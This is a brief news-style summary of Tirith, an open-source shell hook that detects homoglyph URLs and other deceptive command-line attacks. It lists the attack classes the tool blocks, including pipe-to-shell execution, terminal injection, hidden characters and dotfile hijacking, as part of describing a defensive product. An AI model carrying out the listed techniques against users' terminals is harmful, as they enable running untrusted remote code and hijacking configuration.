Tirith is a new open-source, cross-platform tool that detects and blocks homoglyph and other deceptive attacks in command-line environments by analyzing URLs in pasted or typed commands and preventing their execution. It hooks into shells like zsh, bash, fish, and PowerShell to inspect commands locally with sub-millisecond overhead, offering byte-level Unicode inspection and offline auditing without sending telemetry. #Tirith #PowerShell
Keypoints
- Tirith inspects every pasted or typed command in supported shells and can stop execution of suspicious commands.
- It detects homoglyph/homograph attacks, punycode, mixed scripts, and other Unicode lookalikes in URLs.
- The tool also blocks terminal injection, hidden characters, pipe-to-shell patterns, dotfile hijacking, and insecure transports.
- All analysis runs locally with no network calls, no telemetry, and no modification of pasted commands.
- Available on GitHub and via many package managers for Windows, Linux, and macOS, but it does not hook into cmd.exe.